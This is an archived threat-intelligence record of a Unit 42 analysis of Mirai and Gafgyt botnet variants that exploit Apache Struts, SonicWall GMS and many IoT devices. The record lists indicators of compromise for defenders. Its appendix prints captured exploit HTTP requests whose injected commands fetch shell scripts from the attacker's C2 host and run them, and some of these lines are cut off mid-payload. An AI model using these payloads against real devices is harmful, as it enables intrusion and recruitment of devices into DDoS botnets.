{
	"id": "0b31accc-1425-4dfd-9aa7-404d77386b60",
	"created_at": "2026-04-06T00:09:04.147655Z",
	"updated_at": "2026-04-10T03:20:35.981983Z",
	"deleted_at": null,
	"sha1_hash": "4e76b27106703199ec880e1d3c781de6e6b8ea21",
	"title": "Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 336101,
	"plain_text": "Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts,\r\nSonicWall\r\nBy Ruchna Nigam\r\nPublished: 2018-09-10 · Archived: 2026-04-05 21:26:53 UTC\r\nExecutive Summary:\r\nUnit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated\r\nwith unprecedented Distributed Denial of Service attacks in November 2016 and since.\r\nThese variants are notable for two reasons:\r\nThe new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.\r\nThe new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s\r\nGlobal Management System (GMS).\r\nThese developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.\r\nAll organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo\r\nAlto Networks customers, WidlFire detects all related samples with malicious verdicts. Additional protections are noted in\r\nthe conclusion below.\r\nResearch:\r\nOn September 7, 2018, Unit 42 found samples of a Mirai variant that incorporates exploits targeting 16 separate\r\nvulnerabilities. While the use of multiple exploits within a single sample of Mirai has been observed in the past, this is the\r\nfirst known instance of Mirai targeting a vulnerability in Apache Struts.\r\nIn addition, Unit 42 found the domain that is currently hosting these Mirai samples previously resolved to a different IP\r\naddress during the month of August. During that time this IP was intermittently hosting samples of Gafgyt that incorporated\r\nan exploit against CVE-2018-9866 a SonicWall vulnerability affecting older versions of SonicWall Global Management\r\nSystem (GMS). SonciWall has been notified of this development.\r\nThe incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could indicate a larger\r\nmovement from consumer device targets to enterprise targets.\r\nApache Struts exploit in multi-exploit Mirai variant\r\nThe exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution\r\nvulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers. Its format can be seen in\r\nFigure 1, with the payload highlighted.\r\nFigure 1 CVE-2017-5638 exploit format\r\nThe other 15 exploits incorporated in this Mirai variant are detailed in Table 2 in the Appendix below.\r\nWhile these samples are variants of Mirai, they don’t include the bruteforce functionality generally used by Mirai. They use\r\nl[.]ocalhost[.]host:47883 as C2, and the same encryption scheme as Mirai with the key 0xdeadf00d.\r\nSonicWall GMS exploit in Gafgyt variant\r\nThe domain l[.]ocalhost[.]host used for C2 and to serve payloads in the Mirai variant discussed above, has also been found\r\nassociated with other Mirai activity in the past as far back as November 2016.\r\nFor part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127. At that time\r\nwe found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 1 of 7\n\n2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is\r\nnot present in currently supported versions.\r\nThe vulnerability CVE-2018-9866 targeted by the exploit stems from the lack of sanitization of XML-RPC requests to the\r\nset_time_config method. Figure 2 shows the exploit used in the sample, with the payload highlighted.\r\nFigure 2 SonicWall set_time_config RCE format\r\nThese samples first surfaced on August 5, less than a week after the publication of a Metasploit module for this vulnerability.\r\nThe SonicWall public advisory on the issue published on July 17, 2018, can be found here.\r\nThe samples we found are built using the Gafgyt codebase rather than Mirai. Some of the commands supported are\r\ndescribed in the table below.\r\nCommand Description\r\n!* SCANNER\r\n\u003cHUAWEI/GPON/DLINK/SONICWALL/OFF\u003e\r\nBased on arguments provided, the bot starts sending the\r\nassociated exploit to devices.\r\n·      HUAWEI: Send CVE-2017-17215 (See previous\r\ncampaigns)\r\n·      GPON: Same as above\r\n·      DLINK: Send D-Link DSL 2750B OS Command\r\nInjection (see Table 2)\r\n·      SONICWALL: Send exploit in Figure 2.\r\n·      OFF: kills the running process associated with the bot\r\n!* BIN_UPDATE \u003cHTTP SERVER\u003e \u003cFILE\r\nLOCATION\u003e\r\nFetches an update from \u003cHTTP_SERVER\u003e, saves it to\r\n\u003cFILE_LOCATION\u003e, installs update\r\n!* BN \u003cIP\u003e \u003cPORT\u003e \u003cTIME\u003e\r\nLaunch a Blacknurse DDoS attack against \u003cIP\u003e:\u003cPORT\u003e\r\nfor a duration of \u003cTIME\u003e seconds\r\nTable 3 Some commands supported by variant with SonicWall exploit\r\nBlacknurse is a low bandwidth DDoS attack involving ICMP Type 3 Code 3 packets causing high CPU loads first\r\ndiscovered in November 2016. The earliest samples we have seen supporting this DDoS method are from September 2017.\r\nConclusion\r\nThe incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a\r\nlarger movement from consumer device targets to enterprise targets.\r\nPalo Alto Networks AutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2017-5638\r\nCVE-2018-9866\r\nEnGeniusRCE\r\nCVE-2017-6884\r\nDLinkDSL2750BOSCmdInjection\r\nGPONExploits\r\nCVE-2017-17215\r\nDLinkcommandphpRCE\r\nDLinkOSInjection\r\nNetgearRCE\r\nVacronNVRRCE\r\nAutoFocus customers can also use the following malware family tags:\r\nhttps://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 2 of 7\n\nGafygt\r\nELFMirai\r\nWildFire detects all related samples with malicious verdicts.\r\nHere is a list of other vulnerabilities targeted in the Mirai variant targeting Apache Struts:\r\nVulnerability Affected Devices Exploit Format\r\nCVE-2017-\r\n5638,\r\nDevices with\r\nunpatch Apache\r\nStruts\r\nLinksys RCE\r\nLinksys E-series\r\ndevices\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\nPOST /tmBlock.cgi HTTP/1.1\r\nAuthorization: Basic YWRtaW46cG9ybmh1Yg==\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 215\r\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h `wge\r\n%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026StartEPI=1\r\n \r\nThe samples contain other versions of the same exploit using GET and POST requests, aimed at\r\n1 /tmBlock.cgi, /tmUnblock.cgi, /hndBlock.cgi and /hndUnblock.cgi\r\nVacron NVR\r\nRCE\r\nVacron NVR\r\nDevices\r\nSimilar to previous campaigns\r\nThis variant also contains a POST request version of the same exploit :\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nPOST /board.cgi HTTP/1.1\r\nContent-Length: 118\r\nContent-Type: application/x-www-form-urlencoded\r\ncmd=`wget%20http://l.ocalhost.host/vac.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`\r\nhttps://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 3 of 7\n\nD-Link\r\ncommand.php\r\nRCE\r\nSome  D-Link\r\ndevices\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nPOST /command.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 127\r\ncmd=`wget%20http://l.ocalhost.host/cmdphp.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nem\r\nCCTV/DVR\r\nRCE\r\nCCTVs, DVRs\r\nfrom over 70\r\nvendors\r\nSimilar to previous campaigns\r\nEnGenius RCE\r\nEnGenius EnShare\r\nIoT Gigabit Cloud\r\nService 1.4.11\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nPOST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\naction=7\u0026path=\"|wget%20http://l.ocalhost.host/usb.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tm\r\nAVTECH \r\nUnauthenticated\r\nCommand\r\nInjection\r\nAVTECH IP\r\nCamera/NVR/DVR\r\nDevices\r\n1\r\n2\r\n3\r\nGET /cgi-bin/nobody/Search.cgi?\r\naction=cgi_query\u0026ip=google.com\u0026port=80\u0026queryb64str=LW==\u0026username=admin%20;XmlAp%2\r\nO%20-%3E%20/tmp/nemp;sh%20/tmp/nemp);\u0026password=admin\r\nContent-Type: application/x-www-form-urlencoded\r\nCVE-2017-\r\n6884\r\nZyxel routers\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\nGET /cgi-bin/luci/;stok=\u003cClipped\u003e/expert/maintenance/diagnostic/nslookup?\r\nnslookup_button=nslookup_button\u0026ping_ip=google.ca%3b%20`wget%20http://l.ocalhost.host/luci.\r\nAccept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://192.168.0.1/cgi-bin/luci/;stok=\u003cClipped\u003e/expert/maintenance/diagnostic/nslookup\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: csd=9; sysauth=\u003cClipped\u003e\r\nConnection: close\r\nhttps://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 4 of 7\n\nNetGain ‘ping’\r\nCommand\r\nInjection\r\nNetGain Enterprise\r\nManager 7.2.562\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\nPOST /u/jsp/tools/exec.jsp HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nCookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF\r\nConnection: close\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nContent-Length: 206\r\ncommand=cmd+%2Fc+ping\u0026argument=127.0.0.1+%7C+`wget%20http://l.ocalhost.host/exec.sh%2\r\n%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026async_output=ping1487856455258\u0026isWindows=false\r\nNUUO OS\r\nCommand\r\nInjection\r\nNUUO NVRmini 2\r\n3.0.8 1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\nPOST /handle_iscsi.php HTTP/1.1\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin\r\nConnection: close\r\nContent-Length: x\r\nact=discover\u0026address=1.3.3.7|`wget%20http://l.ocalhost.host/iscsi.sh%20-O%20-%3E%20/tmp/n\r\nhttps://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 5 of 7\n\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nNUUOS OS\r\nCommand\r\nInjection\r\nNUUO NVRmini 2\r\n3.0.8\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\nPOST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1\r\nCache-Control: max-age=0\r\nContent-Length: 187\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en\r\nConnection: close\r\nbfolder=%2Fmtd%2Fblock3\u0026bfile=|`wget%20http://l.ocalhost.host/cgisys.sh%20-O%20-%3E%20\r\nNetgear\r\nsetup.cgi\r\nunauthenticated\r\nRCE\r\nDGN1000 Netgear\r\nrouters\r\nSimilar to previous campaigns\r\nHNAP\r\nSoapAction-Header\r\nCommand\r\nExecution\r\nD-Link devices\r\nSimilar to previous campaigns\r\nThis variant uses an effective version of the exploit as opposed to the faulty one used in the campaigns linked\r\nhttp://purenetworks[.]com/HNAP1/GetDeviceSettings/\r\nD-Link OS\r\nCommand\r\nInjection\r\nD-Link DSL-2750B\r\nSimilar to previous campaigns\r\nhttps://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 6 of 7\n\nJAWS\r\nWebserver\r\nauthenticated\r\nshell command\r\nexecution\r\nMVPower DVRs,\r\namong others\r\nSimilar to previous campaigns\r\nCVE-2018-\r\n10561, CVE-2018-10562\r\nDasan GPON\r\nrouters\r\nSimilar to previous campaigns\r\nThis variant also includes a POST request version of the same exploit\r\nTable 2 Other exploits used in the same sample\r\nIndicators of Compromise\r\nSamples with Apache Struts exploit CVE-2017-5638\r\nd6648a36f55d6b8ffd034df7d04156d31411719ce9bc28e6d30c8427feacb397\r\n710d56a90b5f61c7ae82fcf305d23d48476e4f237ffff9d68b961171f168f255\r\n52274c46933c20aaf64fd4c11557143fcfdc76eef192743fafd1b3a8bed3f4d2\r\n078eef70d754e9b64bc783f085846a2e8ae419653a79ed2386c4ade86fde68cb\r\nef090093496ccdab506848166a07554bfa74eb98a0546171b84fc73861f67c79\r\n49cdb537f5e4081362545532a623f597212c8cea847cf9f2b2f1fe1f3cd0ec2f\r\n99c22a0c0e252ab123fb3167f49d94dc12960b79565ca6dfd28f2ff5b0346348\r\nae2354a5d8b84fb6ea6fc4b9ca3060959d5c0c77684cd2100731df2a3c7a204e\r\n1913cf8e65114136cc309e72c384b717f0aeaaeae0c040188648c4afebce1669\r\nSamples with Sonicwall GMS exploit CVE-2018-9866\r\n1814c010f5e7391c7ea38850f9caf0771866e315f8d0c58c563818e71d30c208\r\n29540468514cd48b6c2571722018dffb49d12f99c95b248a44a1455fff01acfb\r\n39891a1c13e4e6ec9de410201f697d23c05e83a29ec0010c6c62c6829386e6a6\r\n596270e91ccee3ec04a552bafde586af127ecac7141852edb9707ac6c4779a99\r\n68b27935c7d064478339f7d95b57ff06ffa1efbd81009b4a2870c5cf3e0b0b35\r\n92a4c6ae034c3a03c21b74bdc00264192e60a85deedd90b99a3e350758eb85c1\r\naab0ec600cdf57f28f9480ff3a9d3547f699af005c015b74c5c9e39a992570b6\r\nd8fbf6d68993045b4840729c788665ab10c50c42b27246a290031664f3b956eb\r\ndafe1b513183902692c8ba8b2a95fede7c13937e49bf21294de448df05edff18\r\nf89d742c4d3312ac9bd707a9135235482c554e369cb646dcd97f6a14b4210136\r\nfab034d705b3ad7a10101858daf5da93a88f8bfd509dee9b8072678b27290ed3\r\nInfrastructure\r\nl[.]ocalhost[.]host\r\n185[.]10[.]68[.]213\r\n185[.]10[.]68[.]127\r\nSource: https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nhttps://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/"
	],
	"report_names": [
		"unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall"
	],
	"threat_actors": [],
	"ts_created_at": 1775434144,
	"ts_updated_at": 1775791235,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e76b27106703199ec880e1d3c781de6e6b8ea21.pdf",
		"text": "https://archive.orkl.eu/4e76b27106703199ec880e1d3c781de6e6b8ea21.txt",
		"img": "https://archive.orkl.eu/4e76b27106703199ec880e1d3c781de6e6b8ea21.jpg"
	}
}